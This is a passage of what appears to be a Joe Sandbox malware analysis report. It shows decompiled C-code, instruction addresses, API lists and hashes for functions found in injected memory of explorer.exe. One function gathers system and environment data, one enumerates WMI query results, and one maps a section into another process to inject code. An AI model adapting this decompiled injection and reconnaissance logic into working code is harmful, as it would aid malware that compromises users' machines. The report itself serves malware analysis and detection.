					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E00088FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E0008B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x9e684; // 0x133f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000895E1(_t199, 0x10c);
				_t200 =  *0x9e684; // 0x133f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000885D5( &_v8);
				_t124 =  *0x9e684; // 0x133f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E00089640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x9e684; // 0x133f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x9e684; // 0x133f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x9e684; // 0x133f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x9e684; // 0x133f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x9e684; // 0x133f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000922D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
				return _t222;
			}



















































        0x0008d01f
        0x0008d029
        0x0008d035
        0x0008d03a
        0x0008d03f
        0x0008d3ff
        0x0008d3ff
        0x0008d04c
        0x0008d052
        0x0008d057
        0x0008d05d
        0x0008d06d
        0x0008d079
        0x0008d079
        0x0008d082
        0x0008d088
        0x0008d08a
        0x0008d093
        0x0008d093
        0x0008d09f
        0x0008d0a3
        0x0008d0a8
        0x0008d0ae
        0x0008d0b7
        0x0008d0c5
        0x0008d0cc
        0x0008d0d1
        0x0008d0d1
        0x0008d0d2
        0x0008d0b9
        0x0008d0b9
        0x0008d0b9
        0x0008d0d8
        0x0008d0e3
        0x0008d0f1
        0x0008d0f7
        0x0008d0fb
        0x0008d101
        0x0008d108
        0x0008d10f
        0x0008d113
        0x0008d11a
        0x0008d11b
        0x0008d128
        0x0008d12a
        0x0008d12f
        0x0008d13c
        0x0008d13e
        0x0008d13e
        0x0008d140
        0x0008d14a
        0x0008d156
        0x0008d166
        0x0008d16c
        0x0008d172
        0x0008d174
        0x0008d185
        0x0008d18b
        0x0008d191
        0x0008d196
        0x0008d19c
        0x0008d1a2
        0x0008d1a7
        0x0008d1ac
        0x0008d1ac
        0x0008d1b2
        0x0008d1b2
        0x0008d1bb
        0x0008d1c7
        0x0008d1cf
        0x0008d1d3
        0x0008d1d3
        0x0008d1cf
        0x0008d1d7
        0x0008d1dd
        0x0008d1e3
        0x0008d1ea
        0x0008d1fb
        0x0008d201
        0x0008d209
        0x0008d210
        0x0008d223
        0x0008d229
        0x0008d22e
        0x0008d231
        0x0008d234
        0x0008d23a
        0x0008d240
        0x0008d242
        0x0008d248
        0x0008d251
        0x0008d254
        0x0008d254
        0x0008d257
        0x0008d25f
        0x0008d26a
        0x0008d270
        0x0008d261
        0x0008d263
        0x0008d263
        0x0008d279
        0x0008d279
        0x0008d27f
        0x0008d287
        0x0008d292
        0x0008d297
        0x0008d29d
        0x0008d29f
        0x0008d2ac
        0x0008d2ad
        0x0008d2ae
        0x0008d2b9
        0x0008d2bb
        0x0008d2c2
        0x0008d2c2
        0x0008d2cc
        0x0008d2d1
        0x0008d2d6
        0x0008d2d6
        0x0008d2dc
        0x0008d2e3
        0x0008d2e4
        0x0008d2f1
        0x0008d304
        0x0008d309
        0x0008d30e
        0x0008d317
        0x0008d317
        0x0008d31d
        0x0008d322
        0x0008d328
        0x0008d32e
        0x0008d333
        0x0008d33c
        0x0008d33e
        0x0008d345
        0x0008d345
        0x0008d34b
        0x0008d353
        0x0008d358
        0x0008d359
        0x0008d35e
        0x0008d367
        0x0008d369
        0x0008d374
        0x0008d374
        0x0008d37d
        0x0008d385
        0x0008d38c
        0x0008d391
        0x0008d3a0
        0x0008d3b8
        0x0008d3bf
        0x0008d3cd
        0x0008d3df
        0x0008d3e6
        0x0008d3f3
        0x00000000

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetCurrentProcessId.KERNEL32 ref: 0008D046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
        • GetCurrentProcess.KERNEL32 ref: 0008D09F
        • GetLastError.KERNEL32 ref: 0008D13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
        • GetLastError.KERNEL32 ref: 0008D172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
        • GetCurrentProcess.KERNEL32 ref: 0008D20E
        • memset.MSVCRT ref: 0008D229
        • GetVersionExA.KERNEL32(00000000), ref: 0008D234
        • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
        • GetSystemInfo.KERNEL32(?), ref: 0008D26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
        • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
        • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
        • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































        0x0008db45
        0x0008db4b
        0x0008db52
        0x0008db55
        0x0008db58
        0x0008db5d
        0x0008db5f
        0x0008db64
        0x0008dfac
        0x0008dfac
        0x0008db71
        0x0008db73
        0x0008db76
        0x0008db79
        0x0008df91
        0x0008df97
        0x0008dfa1
        0x00000000
        0x0008dfa6
        0x0008db84
        0x0008db8b
        0x0008db92
        0x0008db95
        0x0008db9a
        0x0008db9c
        0x0008db9f
        0x0008dba2
        0x0008dba3
        0x0008dbac
        0x0008dbb2
        0x0008dbb5
        0x0008dbbe
        0x0008dbc3
        0x0008dbc8
        0x0008dbdf
        0x0008dbec
        0x0008dbef
        0x0008dbf6
        0x0008dbfb
        0x0008dc02
        0x0008dc07
        0x0008dc0e
        0x0008dc10
        0x0008dc1c
        0x0008dc1f
        0x0008dc21
        0x0008df81
        0x0008df82
        0x0008df8b
        0x00000000
        0x0008df8b
        0x0008dc27
        0x0008dc2a
        0x0008dc2d
        0x0008dc30
        0x0008dc32
        0x0008df4d
        0x0008df50
        0x0008df53
        0x0008df55
        0x0008df77
        0x0008df7c
        0x0008df57
        0x0008df5a
        0x0008df65
        0x0008df6c
        0x0008df6c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0008dc38
        0x0008dc38
        0x0008dc4a
        0x0008dc4d
        0x0008dc4f
        0x00000000
        0x00000000
        0x0008dc57
        0x0008dc5a
        0x0008dc5d
        0x0008dc60
        0x0008dc63
        0x0008dc66
        0x00000000
        0x00000000
        0x0008dc6c
        0x0008dc7a
        0x0008dc7d
        0x0008dc7f
        0x0008dc98
        0x0008dca7
        0x0008dcaf
        0x0008dcaf
        0x0008dcb2
        0x0008dcb9
        0x0008dcbd
        0x0008dcc3
        0x0008dcc5
        0x0008df35
        0x0008df3b
        0x0008df41
        0x0008df44
        0x0008df44
        0x00000000
        0x0008df44
        0x0008dcd4
        0x0008dce8
        0x0008dcec
        0x0008dcee
        0x0008dcf3
        0x0008df02
        0x0008df08
        0x0008df13
        0x0008df1e
        0x0008df24
        0x0008df2a
        0x0008df2d
        0x00000000
        0x0008df2d
        0x0008dcf9
        0x0008ded0
        0x0008ded0
        0x0008ded3
        0x0008ded6
        0x00000000
        0x00000000
        0x0008dd01
        0x0008dd09
        0x0008dd10
        0x0008dd16
        0x0008dd18
        0x00000000
        0x00000000
        0x0008dd21
        0x0008dd36
        0x0008dd3c
        0x0008dd45
        0x0008dd48
        0x0008dd4b
        0x0008dd4d
        0x0008dec3
        0x0008dec6
        0x0008decf
        0x0008decf
        0x00000000
        0x0008decf
        0x0008dd5d
        0x0008dd60
        0x0008dd67
        0x0008dd6d
        0x0008dd70
        0x0008dd73
        0x0008dd76
        0x0008dd79
        0x0008ddb5
        0x0008ddb5
        0x0008ddb8
        0x0008de64
        0x0008de78
        0x0008de88
        0x0008de8c
        0x0008de8e
        0x0008dea5
        0x0008dea9
        0x0008deb2
        0x0008debd
        0x00000000
        0x0008debd
        0x0008de94
        0x0008de95
        0x0008de9a
        0x0008de9a
        0x0008de9c
        0x0008de9d
        0x0008dea2
        0x00000000
        0x0008dea2
        0x0008ddbe
        0x0008ddbe
        0x0008ddc1
        0x0008de2c
        0x0008de40
        0x0008de50
        0x0008de54
        0x0008de56
        0x00000000
        0x00000000
        0x0008de5c
        0x0008de5d
        0x00000000
        0x0008de5d
        0x0008ddc3
        0x0008ddc3
        0x0008ddc6
        0x00000000
        0x00000000
        0x0008ddc8
        0x0008ddcb
        0x00000000
        0x00000000
        0x0008ddcd
        0x0008ddcd
        0x0008ddd3
        0x0008ddef
        0x0008ddfe
        0x0008de07
        0x0008de0c
        0x0008de0f
        0x0008de15
        0x0008de15
        0x0008de1a
        0x0008de26
        0x00000000
        0x0008de26
        0x0008ddd8
        0x00000000
        0x0008ddd8
        0x0008dd7b
        0x0008dda2
        0x0008dda7
        0x0008ddac
        0x0008ddae
        0x0008ddae
        0x00000000
        0x0008ddac
        0x0008dd7d
        0x0008dd7d
        0x0008dd80
        0x00000000
        0x00000000
        0x0008dd86
        0x0008dd86
        0x0008dd89
        0x00000000
        0x00000000
        0x0008dd8f
        0x0008dd8f
        0x0008dd92
        0x00000000
        0x00000000
        0x0008dd98
        0x0008dd9b
        0x00000000
        0x00000000
        0x0008dd9d
        0x00000000
        0x0008dd9d
        0x0008dedf
        0x0008dee5
        0x0008deeb
        0x0008deee
        0x0008def1
        0x0008def1
        0x0008def4
        0x0008def5
        0x0008def8
        0x0008defa
        0x00000000
        0x00000000
        0x0008df4a
        0x0008df4a
        0x00000000
        0x0008df4a
        0x0008dc81
        0x0008dc87
        0x00000000
        0x0008dc87
        0x0008df47
        0x00000000
        0x0008dbca
        0x0008dbcf
        0x0008dbd4
        0x00000000
        0x0008dbd8

        APIs
          • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
          • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
          • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
          • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
          • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
        • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
        • SysFreeString.OLEAUT32(?), ref: 0008DF82
        • SysFreeString.OLEAUT32(?), ref: 0008DF8B
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
        • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
        • Opcode Fuzzy Hash: 2e605f16a7bee3e13d6a0837757ba05e1d766071a1216dbb015d656176137527
        • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
        Download Yara Rule
        C-Code - Quality: 59%
        			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x133f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x133f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































        0x0008c6c6
        0x0008c6cd
        0x0008c6cf
        0x0008c6d1
        0x0008c6d3
        0x0008c6d6
        0x0008c6d9
        0x0008c6dc
        0x0008c6df
        0x0008c6e2
        0x0008c6e5
        0x0008c6ef
        0x0008c6f2
        0x0008c6f9
        0x0008c6fe
        0x0008c6fe
        0x0008c704
        0x0008c706
        0x0008c70f
        0x0008c8b5
        0x0008c8b9
        0x0008c8be
        0x0008c8c4
        0x0008c8c7
        0x0008c8c7
        0x0008c8cb
        0x0008c8d0
        0x0008c8d5
        0x0008c8e2
        0x0008c8e2
        0x0008c8eb
        0x0008c8ed
        0x0008c8f5
        0x0008c8f5
        0x0008c8fc
        0x0008c8fc
        0x0008c718
        0x0008c719
        0x0008c71e
        0x0008c724
        0x0008c726
        0x0008c727
        0x0008c728
        0x0008c72d
        0x0008c72e
        0x0008c738
        0x00000000
        0x00000000
        0x0008c743
        0x0008c74d
        0x0008c757
        0x0008c75a
        0x0008c760
        0x0008c767
        0x0008c768
        0x0008c769
        0x0008c772
        0x0008c773
        0x0008c774
        0x0008c776
        0x0008c779
        0x0008c77c
        0x0008c77f
        0x0008c782
        0x0008c78e
        0x0008c7b0
        0x0008c7b8
        0x0008c7bb
        0x0008c7c6
        0x0008c7c6
        0x0008c7b8
        0x0008c7cc
        0x0008c7d5
        0x0008c7d7
        0x0008c7d8
        0x0008c7da
        0x0008c7db
        0x0008c7dc
        0x0008c7dd
        0x0008c7e1
        0x0008c7e8
        0x0008c7e9
        0x0008c7f1
